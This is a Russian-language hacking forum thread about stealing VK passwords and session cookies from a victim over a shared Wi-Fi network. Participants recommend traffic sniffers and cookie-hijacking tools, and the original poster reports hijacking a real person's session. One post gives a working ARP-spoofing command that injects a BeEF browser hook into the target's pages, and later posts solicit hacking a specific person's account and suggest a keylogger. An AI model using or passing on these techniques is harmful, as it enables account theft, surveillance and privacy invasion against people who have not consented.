Просмотр полной версии : Взлом ВК через локалку (WI-FI)
Ololeshka
19.08.2015, 19:45
Всем привет. Нужно слить пароль/куки с компа жертвы. Весь траффик проходит через роутер, к которому у меня есть доступ по воздуху (и скорее всего к его интерфейсу, роутер TP-Link). Я имею ноут с вин 8 и кали линукс, а так же желание.
hahanovB
19.08.2015, 21:55
Юзай http://comax.fr/yamas.php в Kali Linux
Ololeshka
19.08.2015, 22:33
↑ (https://antichat.live/posts/3882232/)
Юзай
http://comax.fr/yamas.php
в Kali Linux
не, жертва сидит на куках, а не входит/выходит, так что это не сработает
должны же быть более существенные методы, при имении полного доступа хотя бы к тому же роутеру, может можно подменить траффик или че то типа того.
hahanovB
19.08.2015, 22:36
↑ (https://antichat.live/posts/3882249/)
не, жертва сидит на куках, а не входит/выходит, так что это не сработает
http://comax.fr/yamas.php + Wireshark?
Ettercap + Wireshark?
VentaL74
20.08.2015, 02:10
Насколько я знаю, android мобила в связке с http://4pda.ru/forum/index.php?showtopic=243228 или http://4pda.ru/forum/index.php?showtopic=262107 должна справиться
Ololeshka
20.08.2015, 02:17
↑ (https://antichat.live/posts/3882250/)
http://comax.fr/yamas.php + (http://comax.fr/yamas.php)
Wireshark?
↑ (https://antichat.live/posts/3882301/)
Насколько я знаю, android мобила в связке с
http://4pda.ru/forum/index.php?showtopic=243228
или
http://4pda.ru/forum/index.php?showtopic=262107
должна справиться
Да, ,возможно но они достаточно лагучие ибо не обновлялись туеву хучу лет. В любом случае спасибо за ответы, завтра протестирую у себя и отпишусь.
DarkActions
22.08.2015, 15:42
Отпишись о результате, тоже интересно.
Воу спасибо за программку, щас пойду ломать соседнюю тяночку
Ololeshka
22.08.2015, 17:30
Отлично работает под виндоус связка Cain+Wireshark+EditThisCookie. Сейчас быстренько поставлю кали и буду под ней тетировать более эффективный способ. Если что, обращайтесь за подробностями.
↑ (https://antichat.live/posts/3883209/)
Отлично работает под виндоус связка Cain+Wireshark+EditThisCookie. Сейчас быстренько поставлю кали и буду под ней тетировать более эффективный способ. Если что, обращайтесь за подробностями.
сюда подробности выложи, будет интересно почитать
Ololeshka
23.08.2015, 04:52
1 способ (под виндой) тут (https://www.youtube.com/watch?v=NR8dnCaus5I).
В лабораторных условиях все сработало на ура, в поле вышел фейл-жертва не вышла на связь.
2 способ (линукс) еще не полностью проверил, в принципе вот (https://www.youtube.com/watch?v=JNXOBN8kJrM) он.
Позже отпишу о конечном результате, если есть вопросы по теме-задавайте.
Ruslan1993it
23.08.2015, 22:21
dsploit + intercepter
Ololeshka
25.08.2015, 02:38
Напишу репорт о работе в поле.
Короче как и предполагалось куки я захавал, обработал на страничку попал, все это заняло примерно минуты 3.
Теперь о минусах: куки завязаны с ip, то бишь работать с ними можно только на месте, домой вы их не унесете. Насколько я понял, так можно сделать только с теми куками, которые мы получили сразу после авторизации "жертвы". Это реально в тех же макдаках и т.п., а т.к. я ловил свою "жертву" на ПМЖ, то такое вряд-ли прокатит, ну либо надо поседеть пару суток. Плюс ко всему жизнь этих "кук" истекает после нажатия жертвой кнопки "выход".
Вывод: способ довольно малоэффективен. При наличии моих ресурсов можно придумать что-нибудь более эффективное, но т.к. я в этом вопросе относительно дилетант, то хз.
icyclopys
26.08.2015, 09:57
↑ (https://antichat.live/posts/3883988/)
Напишу репорт о работе в поле.
Короче как и предполагалось куки я захавал, обработал на страничку попал, все это заняло примерно минуты 3.
Теперь о минусах: куки завязаны с ip, то бишь работать с ними можно только на месте, домой вы их не унесете. Насколько я понял, так можно сделать только с теми куками, которые мы получили сразу после авторизации "жертвы". Это реально в тех же макдаках и т.п., а т.к. я ловил свою "жертву" на ПМЖ, то такое вряд-ли прокатит, ну либо надо поседеть пару суток. Плюс ко всему жизнь этих "кук" истекает после нажатия жертвой кнопки "выход".
.
Дак, не хорошо у друзей тырить. Ладно бы у соседей, то пожалуйста.
Не забывай, что человек может авторизоваться куда нибудь еще. Пароли могут совпадать и т.п. Включи ты фантазию наконец.
Ololeshka
26.08.2015, 13:07
↑ (https://antichat.live/posts/3884413/)
Дак, не хорошо у друзей тырить. Ладно бы у соседей, то пожалуйста.
Не забывай, что человек может авторизоваться куда нибудь еще. Пароли могут совпадать и т.п. Включи ты фантазию наконец.
Цель была не стырить, а по практиковать полученные знания на будущее.
↑ (https://antichat.live/posts/3882177/)
Всем привет. Нужно слить пароль/куки с компа жертвы. Весь траффик проходит через роутер, к которому у меня есть доступ по воздуху (и скорее всего к его интерфейсу, роутер TP-Link). Я имею ноут с вин 8 и кали линукс, а так же желание.
вк через https работает, так что скорее всего ничего не получится.
icyclopys
26.08.2015, 17:04
↑ (https://antichat.live/posts/3884475/)
вк через https работает, так что скорее всего ничего не получится.
Вообще-то всё можно обойти. /threads/345266/ (https://antichat.live/threads/345266/)
Ololeshka
27.08.2015, 02:59
↑ (https://antichat.live/posts/3884475/)
вк через https работает, так что скорее всего ничего не получится.
а то, что все получилось и я уже об этом писал-это ничего, да? хттпс обходиться как два пальца (пост выше, + я видео гайд кидал). в моем случае все прошло гладко и без этого.
BabaDook
27.08.2015, 15:53
MITMF+cobalt+beef
смысл такой.
делаешь митм атаку с инжектом в страницу. получаешь некий доступ к жертве, дальше подсовываешь её что-то , или же рыскаешь на наличие сплоитов, в любом случае это лучшее решение. Но есть некторые нюансы
Ololeshka
27.08.2015, 16:52
↑ (https://antichat.live/posts/3884905/)
MITMF+cobalt+beef
смысл такой.
делаешь митм атаку с инжектом в страницу. получаешь некий доступ к жертве, дальше подсовываешь её что-то , или же рыскаешь на наличие сплоитов, в любом случае это лучшее решение. Но есть некторые нюансы
А можно подробнее? А то я о такой связке не слышал, да и шарю пока не ахти.
BabaDook
27.08.2015, 17:42
Всё в кали
запускаешь BEEF ДАЛЕЕ В КОНСОЛЕ КОПИРУЕШЬ сылку твой it:3000/hook.js
apt-get install mitmf
mitmf --arp --spoof -gateway 192.168.1.1 -target трой ip --inject js-url твой it:3000/hook.js
про установку кобольта долго объяснять, но этого хватит. если что ЛС. но я бываю редко. Точнее не часто
А если Kali поставить на виртуалку, нужны ли какие нибудь надстройки над windows для полной работы kali?
спасибо всем за советы в теме, тоже актуальной оказалась проблема
↑ (https://antichat.live/posts/3882301/)
Насколько я знаю, android мобила в связке с
http://4pda.ru/forum/index.php?showtopic=243228
или
http://4pda.ru/forum/index.php?showtopic=262107
должна справиться
Спасибо за информацию. Проги хоть и давно не обновлялись, но потестирую обязательно
↑ (https://antichat.live/posts/3884475/)
вк через https работает, так что скорее всего ничего не получится.
вот как раз vk работает по умолчанию по http
Intercepter-ng хватит с головой для такой задачи. Там есть функционал для "убийства" куков и перехвата логина с паролем при последующей авторизации.
Видосов по использованию на ютубе масса)
↑ (https://antichat.live/posts/3882177/)
Нужно слить пароль/куки с компа жертвы.
Может помочь клавиатурный шпион
↑ (https://antichat.live/posts/3925969/)
кто нибуть может помочь?
Конечно же может помочь МВД,отдел "К" ну и господь Бог.И как вариант, подари своей женщине триппер,а она ему!Эдак запусти ему червя....Вот это будет по хакерски!))))
↑ (https://antichat.live/posts/3925969/)
нужен взлом ВК,буду благодарен,гнусный тип списывается с женатыми женщинами, назначает встречи,случай тяжёлый в плане взлома ,нет ни почты ,ни телефона,телефона не даёт ,связь только на сайте,скрывает даже на странице друзей друг от друга,кто нибуть может помочь?
найти другую жену)
funfun2016
28.03.2016, 08:54
Всем привет, нужно узнать логин пароль от вк, жертва сидит только на iOS с оф.приложения. Есть доступ к wifi и устройства на iOS и андроид.
World788
22.02.2017, 12:20
Всё в кали
запускаешь BEEF ДАЛЕЕ В КОНСОЛЕ КОПИРУЕШЬ сылку твой it:3000/hook.js
apt-get install mitmf
mitmf --arp --spoof -gateway 192.168.1.1 -target трой ip --inject js-url твой it:3000/hook.js обьясни по подробней как и что?
Если в локалке ,то лучше чем интерцептор не найдешь снифера.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot